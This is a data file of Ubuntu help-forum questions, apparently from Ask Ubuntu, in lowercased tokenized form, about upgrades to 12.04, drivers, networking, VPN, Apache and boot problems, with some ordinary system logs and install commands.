126678	distribution upgrade frozen at `` flashplugin-installer : downloading http ... ''	i have just started to upgrade from ubuntu 11.10 to 12.04 , which i was at the library for ... and when it got to 10mins remaining on `` installing the upgrades '' and the library closed , and now the upgrade has froze and the terminal ( had open b4 disconnecting net ) says : `` flashplugin-installer : downloading http ... '' i am currently at my granddad 's place who has wireless internet ; however i ca n't connect to it due to me typing the incorrect password . and when i plug it into the cable it says it connects but firefox ca n't acess the internet . after searching on my phone , i think i have some ideas on how to fix this issue , but do n't know how to do them . if u can help with any of them it will b very helpful : connect to the internet and allow it to download . the only problem is that the cable wo n't connect and wireless password is incorrect , and i do n't know how to change the wireless password on the system , though when i go into network connections , nothing shows up under any of the connection tabs , although the wireless still shows in the dropdown menu on the top bar . if you know how to change the password in wireless password in the ternimal it will help . another thing i 've found is that with some other people using terminal to cancel the particular thig that froze it made it start working agin , so if anyone knows the command to cancel the flashplugin-installer that might also help . really do n't want to risk it , but if it 's at this point and i shutdown , will it break my os , or will it be ok ? ( i will only do it if it is safe and as a last resort ) .
126682	install 32bit java ( openjdk ) on 64bit ubuntu 12.04	i have to run juniper vpn on the 64bit ubuntu 12.04 . i have installed openjdk-7-jre , openjdk-7-jdk and icedtea-7-plugin . after the browser prompts to install the juniper vpn , i check it has been successfully installed to `` /home/huangyun/.juniper_networks/network_connect '' . i open the firefox from command line and check the log : launching `` /usr/lib/jvm/java-6-openjdk-amd64/jre/bin/java '' `` -classpath '' `` /home/huangyun/.juniper_networks/network_connect/nc.jar '' `` nc '' `` -h '' `` extranet.scei.a-star.edu.sg '' `` -l '' `` 0 '' `` -l '' `` 0 '' `` -n '' `` '' `` -t '' `` '' `` -x '' i run the above command manully : $ java -classpath ~/.juniper_networks/network_connect/nc.jar nc -h extranet.scei.a-star.edu.sg -l 0 -l 0 -n `` '' -t `` '' -x failed to load the ncui library . quitting . i check the file libncui.so and found that the .so file is 32-bit version : $ file libncui.so libncui.so : elf 32-bit lsb shared object , intel 80386 , version 1 ( sysv ) , dynamically linked , stripped i can not recompile the 32-bit .so file to 64-bit , so i think i have to install 32bit java on 64bit ubuntu 12.04 . could you please tell me how to do it ? i have searched the web but find little information .
126688	reset all ubuntu 11.10 compiz settings to default	is there a way to reset all settings of compiz in ubuntu 11.10 to their defaults ? i totally messed up and it is causing a lot of problems on my computer , so please suggest a solution .
126690	installation process takes too long	when i was installing ubuntu 12.04 lts in my system the installation process stopped at 43 of 93 . there it spent about 1 hour , but did not proceed , so then i skipped the process . after that , installation process ended successfully . the same problem occured when i installed ubuntu 10.10 as well as ubuntu 11.04 in my system . though i ca n't see any major problems , i want to know if there could be any minor/major problem that i have n't noticed . is there any file or application that would have been prevented from installing and how can i sort it out ?
126692	upgrade gone wrong . wiped existing os now what ?	tried to upgrade from usb stick and something went wrong.. the removing conflicting os message `` stuck '' with no disk activity or cpu . rebooted and now the upgrade does n't detect an os on the existing drive ... . my user data appears to be intact . how do i proceed without losing my data ?
126695	how can i setup my machine and my local net to create a ipv6 apache server ?	i see the ubuntu 11.10 has enabled the ipv6 address . eth0 link encap : ethernet hwaddr 78:2b : cb : b0 : a0:47 inet addr:192.168.12.11 bcast:192.168.12.255 mask:255.255.255.0 inet6 addr : fe80 : :7a2b : cbff : feb0 : a047/64 scope : link has it enabled the ipv6 routing ? can i setup the apache2 on it to make it accept the eth0 ipv6 address : http : // [ fe80 : :7a2b : cbff : feb0 : a047 ] , at least from the same machine ? does it need to configure the apache ? which kind of router support ipv6 routing ? how to test it ? the information of my system and my local net : i can `` ping6 fe80 : :7a2b : cbff : feb0 : a047 % eth0 '' , but i ca n't `` ping6 fe80 : :7a2b : cbff : feb0 : a047 '' i can access `` http : // [ : :1 ] '' and `` http : // [ : :ffff:192.168.12.11 ] '' and i can access the other machine using ipv6-v4 map `` http : // [ : :ffff:192.168.12.66 ] '' i ca n't access both local machine and the other machine in my lan by ipv6 address : http : // [ fe80 : :7a2b : cbff : feb0 : a047 ] and http : // [ fe80 : :7a2b : cbff : feb0 : a048 ] the overall question is : how can i setup my machine and my local net to create a ipv6 apache server ?
126699	how to setup ati mobility radeon hd 4650 ?	i 'm currently using ubuntu 12.04 64bit . after installing ati/amd proprietary fglrx graphics drivers via additional drivers , i checked the status of my vga card using lspci -v. here 's the output : 02:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati m96 [ mobility radeon hd 4650 ] ( prog-if 00 [ vga controller ] ) subsystem : dell device 0456 flags : bus master , fast devsel , latency 0 , irq 46 memory at d0000000 ( 32-bit , prefetchable ) [ size=256m ] i/o ports at 2000 [ size=256 ] memory at cfef0000 ( 32-bit , non-prefetchable ) [ size=64k ] [ virtual ] expansion rom at cfe00000 [ disabled ] [ size=128k ] capabilities : kernel driver in use : fglrx_pci kernel modules : fglrx , radeon as mentioned in the title , my vga card is 1gb and yet my computer only recognizes 256mb . my question is : `` how to make my computer fully recognize the capacity of my ati mobility radeon hd 4650 ( 1gb ) ? ''
126700	how to add the old startup sound ( not login sound ) ?	i loved that sound . but apparantly they have removed it in this new lts . any way to get it back ?
126706	how to close a non-reponsive dialog when it 's secondary dialog is hidden ?	i was in the process of installing `` additional drivers '' when i encountered an error and i was informed to review a log . i left the notification dialog open while i switch to a terminal but when i switched back , the notification dialog was missing/hidden , now the primary dialog wo n't close . i ca n't find the hidden notification dialog even if i minimize everything nor can i find the process pid that the dialog box belongs to ? in even likes these , what can i do ?
126710	is there an offline google docs app ?	just wondering if there are any desktop apps for google docs on ubuntu 12.04 ? i just need to be able to edit docs offline and save them so they auto-sync to my account when i get an internet connection .
126711	ubuntu 12.04 lts desktop 64 bit user permissions or apache2 rewrite problem	i have installed 12.04 desktop 64 bit , manually installed lamp , phpmyadmin , php5-dev , pear , pecl , apc , ssh , created user to own /var/www/ and transferred 3 sites to /www/ . the sites are in subfolders , sites - available all configured , and enabled . one site is pure html , two others - php . enabled curl , but phpmyadmin started at first , also php sites , then stopped working . /show blank pages/ sites said clean urls can not be enabled . html site still working . where is the problem , and why the php sites stop working ? in all apache .conf files allow override is set to all . php sites have .htaccess files . and this configuration worked with ubuntu 10.04 .
126712	why the os is still 32 bit after i updated 11.10 ( 32 bit ) to 12.04 via update manager ?	i updated 11.10 ( 32 bit ) to 12.04 via update manager , but the os is still 32 bit but not default 64 bit . i would like to install 64 bit 12.04 ubuntu . how can do it ? by the way is it possible for the coexistence of 32 bit win and 64 bit ubuntu ? thank you in advance . jinxiang
126718	`` an upgrade from 'precise ' to 'oneiric ' is not unsupported with this tool '' error while upgrading	a brief electrical outage interrupted my 12.04 upgrade . after many tries , which included trying to upgrade from a command line , i was able to access ubuntu screens again . i find that the 12.04 upgrade was indeed not completed ; i am still running 11.10 . however , update manager does not give me the option of installing 12.04 now . and , when i run update manager , i am asked if i want to execute a `` partial install . '' when i answer `` yes , '' i receive the message above . besides a clean install , any ideas about what can i do to upgrade to 12.04 ?
126724	i ca n't boot into a usable system after updates . what should i do ?	due to updates , my machine can no longer boot properly . i am no ubuntu guru . i do not have a week to spare diagnosing the issue . i just want to retrieve important data from this machine 's hard drive and get a working computer again asap . what should i do ?
126725	windows `` problem '' after installing ubuntu , what is it ?	i saw ubuntu 12.04 yesterday and decided to install it . first i went to the bios , then selected security > i / o interface security > new interface card and set it to locked . this is the only way i can get into ubuntu . next i installed ubuntu the usual way . it worked great ( except for the login sound ; i missed it ) . then i went booting into windows 7 . the windows logo kept spinning as usual , then it stopped . next my computer restarted itself and said that there is a `` problem '' with windows so i have to run the windows recovery partition to repair . then it goes through a 1-hour long process and restarted again . i chose windows from the grub menu and windows booted . the question is : what is the anonymous problem that happened to windows ? i am planning to re-install ubuntu now ( because i messed with the boot screen , now it 's gone and shutting down takes forever ) and i do n't want to run into that problem again . any help will be appreciated . edit : re installed ubuntu and this time nothing happens . specs : asus f81se , windows 7 dual-boot
126729	shutdown issues on my dell xps m1530	on my dell xps m1530 lapttop , i am facing issues with shut-down option after upgrading to 12.04 lts from 11.10 . sometimes it shutdowns `` cleanly '' . but other times everything goes down but i can still see the power led glowing ( even after removing the power cord ) . if i keep it like that laptop temperature increases . so finally i opt for `` hard shut-down '' ( i.e . pressing the power button on ) . any thoughts what is happening here ? . edit : i just found this link to already reported bug https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/987933
126731	what does ksplice actually do ?	so i installed ksplice on ubuntu 10.04 : # download the installer wget https : //www.ksplice.com/uptrack/dist/lucid/ksplice-uptrack.deb dpkg -i ksplice-uptrack.deb # install dependencies apt-get install -f # set auto-updates vi /etc/uptrack/uptrack.conf autoinstall = yes and ... ? question : this means that if there is a minor/major kernel update , then ksplice could install it without asking , and i really do n't need to reboot my computer anymore ? ( until 2013-04 according to : https : //en.wikipedia.org/wiki/ubuntu_ % 28operating_system % 29 # releases )
126733	tips for getting videos to run smoother on my poor old laptop ?	i reinstalled xubuntu on my good ol ' laptop from 2005 , and everything works great ! the only problem is that video is slow/choppy - on the order of 4-10 frames a second , depending on the video . i used to stay up late in bed watching shows like arrested development and the wire on this laptop , so not having video is a huge bummer . i 've tried lowering my resolution , and using different media players , like vlc and mplayer . that seems to help a little , but not enough to make videos watchable . another thing i noticed is the proprietary video drivers are n't available anymore - if there is any way to install these things again , that might work . i 'm willing to get my hands dirty , but i 'm not sure where to get started with something like that . back in the ubuntu 8.04 days , the proprietary drivers loaded themselves automatically , but now they do n't work at all . the other thing i could try is re-encoding my videos somehow . that 's something i do n't know where to start with , so if anyone has any advice , i 'd love to hear it . i did manage to install handbrake , but the options are kind of overwhelming , and i 'm not sure where to start . tl ; dr i could use help either a ) installing old , unsupported proprietary drivers or b ) somehow re-encoding videos to be easier on my processor maybe ?
126737	make gnome-terminal show the command running as title	i want the name of command running , e.g unzip to be visible through the title bar of gnome-terminal , but it seems to be impossible , if the application running does n't set a title explicitly , even though i choose 'replace initial title ' option in the profile dialog .
126743	internet access problem in 12.04	yesterday , i have upgraded ubuntu from 11.10 to 12.04 lts and everything was ok ( there was no error ) after restart , my `` auto ethernet '' connection established , also my vpn connection established.and some pages loaded on firefox -- i had a proxy app on my ubuntu 11.10 ( a java app ) and after first restart , in 12.04 proxy connection was ok and i was able to reach any web via firefox with proxy . after switching to chromium with no proxy , there is an error . ( also , i have no internet access any where , in any other application without proxy ! ) so , i found that i can access web pages and services using ip addresses but dns not working . because of my vpn server , i have to set method to automatic , so i can not use other dns servers . what is wrong with my ubuntu ? how can i fix it ? thanks .
126754	rhythmbox and dependencies not getting installed or upgraded in 12.04	after apt-get update -- fix-missing when i do apt-get upgrade i get this : the following packages have been kept back : linux-generic-pae linux-headers-generic-pae linux-image-generic-pae unity-scope-musicstores usb-creator-common usb-creator-gtk 0 upgraded , 0 newly installed , 0 to remove and 6 not upgraded . on apt-get dist-upgrade , the result is : the following new packages will be installed : linux-headers-3.2.0-24 linux-headers-3.2.0-24-generic-pae linux-image-3.2.0-24-generic-pae rhythmbox rhythmbox-data rhythmbox-mozilla rhythmbox-plugin-cdrecorder rhythmbox-plugin-zeitgeist rhythmbox-plugins rhythmbox-ubuntuone syslinux-legacy the following packages will be upgraded : linux-generic-pae linux-headers-generic-pae linux-image-generic-pae unity-scope-musicstores usb-creator-common usb-creator-gtk 6 upgraded , 11 newly installed , 0 to remove and 0 not upgraded . need to get 395 kb/51.4 mb of archives . after this operation , 186 mb of additional disk space will be used . do you want to continue [ y/n ] ? y err `` http : //archive.ubuntu.com/ubuntu/ precise/main rhythmbox-plugin-cdrecorder i386 2.96-0ubuntu4 403 forbidden err `` http : //archive.ubuntu.com/ubuntu/ precise/main rhythmbox-plugin-zeitgeist all 2.96-0ubuntu4 403 forbidden err `` http : //archive.ubuntu.com/ubuntu/ precise/main rhythmbox-plugins i386 2.96-0ubuntu4 403 forbidden failed to fetch `` http : //archive.ubuntu.com/ubuntu/pool/main/r/rhythmbox/rhythmbox-plugin-cdrecorder_2.96-0ubuntu4_i386.deb 403 forbidden failed to fetch `` http : //archive.ubuntu.com/ubuntu/pool/main/r/rhythmbox/rhythmbox-plugin-zeitgeist_2.96-0ubuntu4_all.deb 403 forbidden failed to fetch `` http : //archive.ubuntu.com/ubuntu/pool/main/r/rhythmbox/rhythmbox-plugins_2.96-0ubuntu4_i386.deb 403 forbidden e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? apt-get update -- fix-missing is n't resolving the problem . how can i solve this ? note : i have prefixed the hyperlinks with `` as i could n't post question with > 2 links
126761	triple-booting windows 7 , windows 8 and ubuntu 12.04	i 'm currently dual-booting windows 7 and 8 ( consumer preview ) . if i install ubuntu , will i be able to switch between all three operating systems ?
126763	`` unable to mount android , error initialising camera : -60 : could not lock the device '' when connecting a samsung galaxy s2 via mtp	whenever i connect my samsung galaxy s2 phone ( running android 4.0 ) via usb using an mtp connection one of two messages always pops up , either : unable to mount android : error initialising camera : -60 : could not lock the device or : unable to mount android : error initialising camera : -53 : could not claim the usb device the phone however does mount successfully and i can add and delete files etc . i would just like to understand what the error message means , googling only seems to bring up descriptions of people mounting digital cameras and this does n't seem relevant for a mobile phone .
126764	how can i properly create /dev/dvd ?	certain programs look for /dev/dvd by default to find dvds . when i first boot my computer without a dvd inserted , /dev/dvd exists and points to the correct place ( /dev/sr0 ) . however , when i insert a dvd , /dev/dvd disappears . i 'd like it to stick around so i do n't have to navigate to /dev/sr0 in programs that are looking for dvds . how do i ensure that the /dev/dvd symlink exists and points to the right place ? it looks like i can add something to /etc/udev/rules.d/70-persistent-cd.rules . this site gives a couple of examples , but the 70-persistent-cd.rules file says `` add the env { generated } =1 flag to your own rules '' , which is n't part of the examples . the man 7 udev page is impenetrable to me , and i 'm not convinced the linked page gives 100 % of the information i need . so , what can i do on a modern , ubuntu 12.04 ( or later ) system to make /dev/dvd always exist and point to the right device ? edit : is it as simple as adding env { generated } =1 to the rules in the linked page , something like this : subsystem== '' block '' , kernel== '' sr0 '' , symlink+= '' dvd '' , group= '' cdrom '' , env { generated } =1 is that the right information for modern ubuntu ? what is env { generated } doing there , when it was n't generated , but hand-written ?
126765	skype video not working after upgrade from 11.10 to 12.04	i used skype with this command on ubuntu 11.10 : ld_preload=/usr/lib32/libv4l/v4l1compat.so skype but since i upgraded to 12.04 it dos n't work and i ca n't use my video ( webcam ) . i have latest libv4l and my webcam works with other apps . how can i fix this ?
126766	why is my mts mblaze dongle not getting detected ?	according to the user guide , i need to install the driver that is present on the dongle . but when i insert the dongle , nothing is showing up . the green light on it is blinking , though . it 's getting detected in windows 7 properly .
126769	after upgrading to 12.04 capitel evdo modem is not working	i have a bsnl evdo modem which was working fine on ubuntu 10.10 , 11.04 and 11.10 . yesterday after upgrading to 12.04 via update manager , it is not working and not even detected on the network manager . i downloaded iso ( 64 bit ) and tried a fresh install after formatting the partition , with no effect . i am surprised that the update broke it , please help ! ! ! ! ps : : tested and ensured it is still working fine on windows here is the output on /var/log/usb_modeswitch.log usb_modeswitch log from sat apr 28 12:13:18 2012 using global config file : /etc/usb_modeswitch.conf raw args from udev : /2-1.2:1.0 bus id for device not given by udev . trying to determine it from kernel name ( 2-1.2:1.0 ) ... using top device dir /sys/bus/usb/devices/2-1.2 usb dir exists : /sys/bus/usb/devices/2-1.2 scsi dir exists : /sys/bus/usb/devices/2-1.2 warning : scsi attribute `` vendor '' not readable . warning : scsi attribute `` model '' not readable . warning : scsi attribute `` rev '' not readable . -- -- -- -- -- -- -- -- usb values from sysfs : idvendor 1c9e idproduct 9e00 manufacturer qualcomm , incorporated product usb mmc storage serial 000000000002 bnumconfigurations 1 -- -- -- -- -- -- -- -- bnumconfigurations is 1 - do n't check for active configuration found packed config collection /usr/share/usb_modeswitch/configpack.tar.gz searching entries named : /usr/share/usb_modeswitch/1c9e:9e00* searching overriding entries named : /etc/usb_modeswitch.d/1c9e:9e00* scsi attributes not needed , moving on . extracting config 1c9e:9e00 from collection /usr/share/usb_modeswitch/configpack.tar.gz config : targetclass set to ff driver module is `` option '' , id path is /sys/bus/usb-serial/drivers/option1 ! matched , now switching command to be run : /usr/sbin/usb_modeswitch -i -w -d -s 20 -c /run/usb_modeswitch/current_cfg -u -1 -v 1c9e -p 9e00 2 > & 1 verbose debug output of usb_modeswitch and libusb follows ( note that some usb errors are expected in the process ) -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- tail : /var/log/usb_modeswitch.log : file truncated usb_modeswitch log from sat apr 28 12:13:20 2012 using global config file : /etc/usb_modeswitch.conf raw args from udev : /2-1.2:1.5 bus id for device not given by udev . trying to determine it from kernel name ( 2-1.2:1.5 ) ... using top device dir /sys/bus/usb/devices/2-1.2 usb dir exists : /sys/bus/usb/devices/2-1.2 warning : usb attribute `` serial '' not readable . scsi dir exists : /sys/bus/usb/devices/2-1.2 warning : scsi attribute `` vendor '' not readable . warning : scsi attribute `` model '' not readable . warning : scsi attribute `` rev '' not readable . -- -- -- -- -- -- -- -- usb values from sysfs : idvendor 1c9e idproduct 9e00 manufacturer qualcomm , incorporated product qualcomm cdma technologies msm serial ( null ) bnumconfigurations 1 -- -- -- -- -- -- -- -- bnumconfigurations is 1 - do n't check for active configuration found packed config collection /usr/share/usb_modeswitch/configpack.tar.gz searching entries named : /usr/share/usb_modeswitch/1c9e:9e00* searching overriding entries named : /etc/usb_modeswitch.d/1c9e:9e00* scsi attributes not needed , moving on . reading config file : /run/usb_modeswitch/current_cfg * usb_modeswitch : handle usb devices with multiple modes * version 1.2.3 ( c ) josua dietze 2012 * based on libusb0 ( 0.1.12 and above ) ! please report new configurations ! defaultvendor= 0x1c9e defaultproduct= 0x9e00 targetvendor= not set targetproduct= not set targetclass= 0xff targetproductlist= '' '' detachstorageonly=0 huaweimode=0 sierramode=0 sonymode=0 qisdamode=0 gctmode=0 kobilmode=0 sequansmode=0 mobileactionmode=0 ciscomode=0 messageendpoint= not set messagecontent= '' 55534243123456780000000000000606f50402527000000000000000000000 '' needresponse=0 responseendpoint= not set inquiredevice disabled success check enabled , max . wait time 20 seconds system integration mode enabled looking for target devices ... no devices in target mode or class found looking for default devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 1d6b:0002 searching devices , found usb id 1c9e:9e00 found matching vendor id found matching product id target class ff not matching adding device searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 0bda:0139 searching devices , found usb id 058f : a014 searching devices , found usb id 0cf3:3005 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 found device in default mode , class or configuration ( 1 ) accessing device 007 on bus 002 ... skipping the check for the current configuration using first interface : 0x00 using endpoints 0x08 ( out ) and 0x87 ( in ) usb description data ( for identification ) -- -- -- -- -- -- -- -- -- -- -- -- - manufacturer : qualcomm , incorporated product : usb mmc storage serial no . : 000000000002 -- -- -- -- -- -- -- -- -- -- -- -- - looking for active driver ... ok , driver found ( `` usb-storage '' ) ok , driver `` usb-storage '' detached setting up communication with interface 0 using endpoint 0x08 for message sending ... trying to send message 1 to endpoint 0x08 ... ok , message successfully sent resetting response endpoint 0x87 resetting message endpoint 0x08 device is gone , skipping any further commands checking for mode switch ( max . 20 times , once per second ) ... searching for target devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 1d6b:0002 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 0bda:0139 searching devices , found usb id 058f : a014 searching devices , found usb id 0cf3:3005 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching for target devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 1d6b:0002 searching devices , found usb id 1c9e:9e00 found matching vendor id found matching product id target class ff matching adding device searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 0bda:0139 searching devices , found usb id 058f : a014 searching devices , found usb id 0cf3:3005 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 found target device , now opening found target device 008 on bus 002 target device description data -- -- -- -- -- -- -- -- -- -- -- -- - manufacturer : qualcomm , incorporated product : qualcomm cdma technologies msm serial no . : not provided -- -- -- -- -- -- -- -- -- -- -- -- - found correct target device mode switch succeeded . bye . ok:1c9e:9e00 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- ( end of usb_modeswitch output ) checking success of mode switch for max . 20 seconds ... reading attributes ... usb dir exists : /sys/bus/usb/devices/2-1.2 warning : usb attribute `` serial '' not readable . all attributes matched mode switching was successful , found 1c9e:9e00 ( qualcomm , incorporated : qualcomm cdma technologies msm ) now checking for bound driver ... no driver has bound to interface 0 yet device not in `` bind_list '' yet , bind it now modprobe not foundmodule loader is ( null ) ca n't do anymore without module loader ; get `` modtools '' ! driver binding failed checking for avoid_reset_quirk kernel attribute avoid_reset_quirk activated all done , exiting dmesg entries [ 43.068088 ] usb 2-1.2 : new full-speed usb device number 3 using ehci_hcd [ 43.189986 ] initializing usb mass storage driver ... [ 43.190211 ] scsi7 : usb-storage 2-1.2:1.0 [ 43.190275 ] usbcore : registered new interface driver usb-storage [ 43.190276 ] usb mass storage support registered . [ 43.266543 ] usbcore : registered new interface driver uas [ 44.188822 ] scsi 7:0:0:0 : cd-rom usbmodem disk 2.31 pq : 0 ansi : 2 [ 44.195201 ] sr1 : scsi3-mmc drive : 0x/0x caddy [ 44.195414 ] sr 7:0:0:0 : attached scsi cd-rom sr1 [ 44.195487 ] sr 7:0:0:0 : attached scsi generic sg3 type 5 [ 44.292778 ] sr1 : cdrom ( ioctl ) error , command : xpwrite , read disk info 51 00 00 00 00 00 00 00 02 00 [ 44.292786 ] sr : sense key : hardware error [ current ] [ 44.292789 ] sr : add . sense : no additional sense information [ 44.448614 ] sr1 : cdrom ( ioctl ) error , command : xpwrite , read disk info 51 00 00 00 00 00 00 00 02 00 [ 44.448622 ] sr : sense key : hardware error [ current ] [ 44.448624 ] sr : add . sense : no additional sense information [ 44.680705 ] usb 2-1.2 : usb disconnect , device number 3 [ 45.903611 ] usb 2-1.2 : new full-speed usb device number 4 using ehci_hcd [ 45.998999 ] scsi8 : usb-storage 2-1.2:1.5 [ 46.996804 ] scsi 8:0:0:0 : direct-access usbmodem disk 2.31 pq : 0 ansi : 2 [ 46.997717 ] sd 8:0:0:0 : attached scsi generic sg3 type 0 [ 47.003776 ] sd 8:0:0:0 : [ sdc ] attached scsi removable disk [ 131.624851 ] usb 2-1.2 : usb disconnect , device number 4 [ 137.005910 ] usb 2-1.2 : new full-speed usb device number 5 using ehci_hcd [ 137.101084 ] scsi9 : usb-storage 2-1.2:1.0 [ 138.098644 ] scsi 9:0:0:0 : cd-rom usbmodem disk 2.31 pq : 0 ansi : 2 [ 138.106114 ] sr1 : scsi3-mmc drive : 0x/0x caddy [ 138.106531 ] sr 9:0:0:0 : attached scsi cd-rom sr1 [ 138.106811 ] sr 9:0:0:0 : attached scsi generic sg3 type 5 [ 138.198600 ] sr1 : cdrom ( ioctl ) error , command : xpwrite , read disk info 51 00 00 00 00 00 00 00 02 00 [ 138.198627 ] sr : sense key : hardware error [ current ] [ 138.198635 ] sr : add . sense : no additional sense information [ 138.456257 ] usb 2-1.2 : usb disconnect , device number 5 [ 139.677709 ] usb 2-1.2 : new full-speed usb device number 6 using ehci_hcd [ 139.774058 ] scsi10 : usb-storage 2-1.2:1.5 [ 140.774624 ] scsi 10:0:0:0 : direct-access usbmodem disk 2.31 pq : 0 ansi : 2 [ 140.777200 ] sd 10:0:0:0 : attached scsi generic sg3 type 0 [ 140.783764 ] sd 10:0:0:0 : [ sdc ] attached scsi removable disk [ 156.867977 ] usb 2-1.2 : usb disconnect , device number 6 [ 216.594721 ] usb 2-1.1 : new full-speed usb device number 7 using ehci_hcd [ 216.689732 ] scsi11 : usb-storage 2-1.1:1.0 [ 217.687395 ] scsi 11:0:0:0 : cd-rom usbmodem disk 2.31 pq : 0 ansi : 2 [ 217.694689 ] sr1 : scsi3-mmc drive : 0x/0x caddy [ 217.695092 ] sr 11:0:0:0 : attached scsi cd-rom sr1 [ 217.695397 ] sr 11:0:0:0 : attached scsi generic sg3 type 5 [ 217.787287 ] sr1 : cdrom ( ioctl ) error , command : xpwrite , read disk info 51 00 00 00 00 00 00 00 02 00 [ 217.787312 ] sr : sense key : hardware error [ current ] [ 217.787321 ] sr : add . sense : no additional sense information [ 218.117857 ] usb 2-1.1 : usb disconnect , device number 7 [ 219.338270 ] usb 2-1.1 : new full-speed usb device number 8 using ehci_hcd [ 219.433452 ] scsi12 : usb-storage 2-1.1:1.5 [ 220.430998 ] scsi 12:0:0:0 : direct-access usbmodem disk 2.31 pq : 0 ansi : 2 [ 220.432676 ] sd 12:0:0:0 : attached scsi generic sg3 type 0 [ 220.438016 ] sd 12:0:0:0 : [ sdc ] attached scsi removable disk
126772	wireless is not getting connected on starting 12.04	i am new to ubuntu . i have just upgraded to 12.04 and the wireless is not working . i am sending you the results of the following codes , in case it helps . code : iwconfig rfkill list all result omega @ debasmita-laptop : ~ $ iwconfig lo no wireless extensions . eth2 ieee 802.11 access point : not-associated link quality:5 signal level:0 noise level:0 rx invalid nwid:0 invalid crypt:0 invalid misc:0 eth1 no wireless extensions . omega @ debasmita-laptop : ~ $ rfkill list all 0 : brcmwl-0 : wireless lan soft blocked : no hard blocked : yes 1 : hp-wifi : wireless lan soft blocked : no hard blocked : yes 2 : hp-bluetooth : bluetooth soft blocked : yes hard blocked : yes
126773	ubuntu become very slow and unresponsive after upgrade to 12.04 ?	after upgrading to 12.04 , my system became terribly slow . applications are running very slowly and become very unresponsive . i am not able to do anything . before upgrading , it was running very good , even better than windows . i also often get errors when i try to run an application what should i do ? i want to make my ubuntu work faster again . please help me .
126776	windows border disappeared in ubuntu 12.04	the window borders disappeared mostly when i start a game or an application and then close it . it seems to be a compiz issue and when i restart compiz it will work again but i also get the following warning : compiz ( decor ) - warn : failed to bind pixmap to texture any way to solve this its really annoying ? ? ?
126779	why do i get `` init : failed to create pty ... '' errors on boot ?	i 've installed ubuntu 12.04 yesterday with a liveusb . i had problems at booting , so i had to repair grub , and it was ok . but now when i start up my pc , i get the error message 'init : failed to create pty - disabling logging for job' and nothing happens . how to fix that ?
126780	where can i find the 64bit minimal cd ?	where can i find the minimal install 64bit version ? is it possible to encrypt partition with the minimal minimal version ( like with the alternative version ) ?
126782	keyboard shortcut for lockscreen not working	i tried the combination ctrl+alt+l or l but it is not working . but if i select the menu item lockscreen from setting drop down it works . any thoughts on how to fix keyboard shortcut ? thanks .
126785	dual boot with ubuntu and windows ( ubuntu 12.04lts )	my set up is 1 pc 2 disks disk1 ext4 ubuntu disk2 ntfs windows 7 and am wanting to dual boot with grub 2 . with grub i used to be able to set-up a menu item like this title windows 7 map ( hd0 ) ( hd1 ) map ( hd1 ) ( hd0 ) rootnoverify ( hd0,0 ) chainloader +1 my install method was i installed win7 on disk 1 some time ago and to install ubuntu i cleared my 2nd drive and then disconnected drive 1 completely plugged drive 2 in as drive 1 and installed linux . the logic behind the above grub entry was to keep both os intact i.e . disconnect either drive and the remaining drives os would/could boot because the windows boot loader remains in tack on disk 2 and grub takes care of disk 1 . i understand i can add the above to the 40_custom in /etc/grub.d/ but am not sure if update-grub will still go of and attempt anything i do not intend any help or assistance would be appreciated as it stands i can boot both o/s via boot device selection form bios but in the old days with a gentoo install i was able to do so with grub .
126787	how to take screenshot of indicator menus ?	if i hover over to the setting menu or any of the indicator menus , prnt scrnbutton wo n't work . if i want to take the snapshot of these menus , how do i do that ?
126788	should i do an upgrade with a doubtful internet connection ?	i have a very slow internet connection ( downloading speed is always between 40-50kbps ) and it may cut any second.so if i start my upgrade and the internet connection disconnects is there any problem like system error.etc..or will it restore to its old state ( 11.10 ) .
126789	ca n't upgrade due to 404 error	the upgrade is successfully started , but then got this error : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/dapper/main/source/sources 404 not found [ ip : 91.189.92.181 80 ] ... the internet connection is fine . when i simply open that url in browsed i still get 404 . /etc/apt/sources.list : deb http : //ua.archive.ubuntu.com/ubuntu/ oneiric main restricted deb-src http : //ua.archive.ubuntu.com/ubuntu/ oneiric main restricted deb http : //ua.archive.ubuntu.com/ubuntu/ oneiric-updates main restricted deb-src http : //ua.archive.ubuntu.com/ubuntu/ oneiric-updates main restricted deb http : //ua.archive.ubuntu.com/ubuntu/ oneiric universe deb-src http : //ua.archive.ubuntu.com/ubuntu/ oneiric universe deb http : //ua.archive.ubuntu.com/ubuntu/ oneiric-updates universe deb-src http : //ua.archive.ubuntu.com/ubuntu/ oneiric-updates universe deb http : //ua.archive.ubuntu.com/ubuntu/ oneiric multiverse deb-src http : //ua.archive.ubuntu.com/ubuntu/ oneiric multiverse deb http : //ua.archive.ubuntu.com/ubuntu/ oneiric-updates multiverse deb-src http : //ua.archive.ubuntu.com/ubuntu/ oneiric-updates multiverse deb http : //security.ubuntu.com/ubuntu oneiric-security main restricted deb-src http : //security.ubuntu.com/ubuntu oneiric-security main restricted deb http : //security.ubuntu.com/ubuntu oneiric-security universe deb-src http : //security.ubuntu.com/ubuntu oneiric-security universe deb http : //security.ubuntu.com/ubuntu oneiric-security multiverse deb-src http : //security.ubuntu.com/ubuntu oneiric-security multiverse deb http : //extras.ubuntu.com/ubuntu oneiric main deb-src http : //extras.ubuntu.com/ubuntu oneiric main deb-src http : //archive.canonical.com/ lucid partner deb-src http : //archive.ubuntu.com/ubuntu dapper main multiverse deb-src http : //archive.ubuntu.com/ubuntu dapper-updates main multiverse deb http : //archive.canonical.com/ lucid partner deb-src http : //archive.canonical.com/ lucid partner how can i get through this ?
